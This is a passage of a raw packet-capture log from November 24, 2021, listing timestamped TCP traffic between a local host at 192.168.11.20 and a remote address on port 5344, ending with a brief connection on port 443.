                                                                                                  Nov 24, 2021 14:16:26.576225042 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576394081 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576499939 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576554060 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576561928 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576633930 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576687098 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576695919 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576704025 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576760054 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576872110 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576927900 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576941013 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576951027 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.576958895 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577011108 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577061892 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577071905 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577080011 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577138901 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577147961 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577244043 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577251911 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577259064 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577341080 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577378988 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577425957 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577431917 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577440977 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577450991 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577459097 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577547073 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577555895 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577673912 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577738047 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577764988 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577774048 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577783108 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577790976 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577883959 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577915907 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577919006 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.577939987 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577950001 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577959061 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577969074 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.577976942 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578042984 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578051090 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578072071 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578177929 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578222036 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578227997 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578253031 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578299999 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578309059 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578382969 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578495979 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578499079 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578507900 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578551054 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578558922 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578563929 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578659058 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578737020 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578751087 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578799009 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578808069 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578867912 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.578882933 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.578994989 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579045057 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579060078 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579073906 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579128981 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579165936 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579245090 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579298973 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579304934 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579312086 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579387903 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579405069 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579508066 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579518080 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579560995 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579566002 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579648972 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579672098 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579770088 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579780102 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579787970 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579826117 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579832077 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.579889059 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.579981089 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.580002069 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580056906 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580127001 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580132008 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.580259085 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580271006 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.580373049 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580425024 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580435038 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580476046 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.580514908 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580624104 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580653906 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.580657959 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.580681086 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580689907 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580779076 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580869913 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580899954 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.580924034 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.580938101 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.581032038 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.581078053 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.581082106 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.581121922 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.581409931 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.587641001 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587692976 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587810040 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587811947 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.587918997 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587930918 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587939978 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587970018 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587982893 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.587989092 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588000059 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588009119 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588018894 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588027954 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588037968 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588047028 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588073969 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588095903 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588102102 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588110924 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588119984 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588129997 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588138103 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588148117 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588155985 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588165998 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588192940 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588196039 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588196993 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588197947 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588207960 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588217020 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588227034 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588234901 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588244915 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588376045 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588377953 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588380098 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588382006 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588382959 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588382959 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588382959 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588383913 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588383913 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588385105 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588385105 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588385105 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588386059 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588386059 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588387012 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588395119 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588403940 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588413954 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588422060 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588432074 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588469028 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588558912 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588561058 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588562012 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588562965 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588562965 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588563919 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588563919 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588565111 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588565111 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588566065 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588566065 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588567019 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588567019 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588582039 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588593006 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588653088 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588656902 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588660955 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588661909 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588663101 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588664055 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588664055 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588675022 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588685989 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588695049 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588700056 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588710070 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588717937 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588727951 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588736057 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588746071 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588753939 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588763952 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588773012 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588783026 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588789940 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588794947 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588804960 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588813066 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588823080 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588830948 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588840961 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588850021 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588859081 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588871002 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588881016 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588884115 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588895082 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588905096 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588912964 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588922977 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588932037 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588942051 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588949919 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588958025 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588964939 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588968039 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588969946 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.588975906 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588984966 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.588994980 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589003086 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589013100 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589025021 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589034081 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589042902 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589054108 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589066982 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589080095 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589088917 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589103937 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589106083 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589107990 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589150906 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.589154959 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589158058 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589159966 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589162111 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589164019 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589246988 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589251041 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589252949 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589255095 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589257002 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589258909 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589261055 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589262962 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589385986 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.589390039 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.595390081 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.595757961 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.608256102 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608432055 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.608724117 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608841896 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608896017 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608906031 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608916044 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608925104 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608936071 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608947039 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.608952045 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609009027 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609020948 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609030008 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609040022 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609052896 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609067917 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609081030 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609092951 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609107971 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609118938 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609133959 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609143972 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609148026 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609150887 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609153986 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609157085 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609159946 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609169960 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609180927 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609189987 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609200001 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.609322071 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609327078 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609497070 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.609545946 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.650705099 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.651046038 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.843163967 CET498105344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.861949921 CET534449810194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:26.972156048 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:26.992789030 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:27.040564060 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:50.282197952 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:16:50.282860994 CET498065344192.168.11.20194.85.248.156
                                                                                                  Nov 24, 2021 14:16:50.370946884 CET534449806194.85.248.156192.168.11.20
                                                                                                  Nov 24, 2021 14:17:04.965882063 CET49827443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:04.965984106 CET44349827142.250.185.78192.168.11.20
                                                                                                  Nov 24, 2021 14:17:04.966191053 CET49827443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:04.998258114 CET49827443192.168.11.20142.250.185.78
                                                                                                  Nov 24, 2021 14:17:04.998320103 CET44349827142.250.185.78192.168.11.20
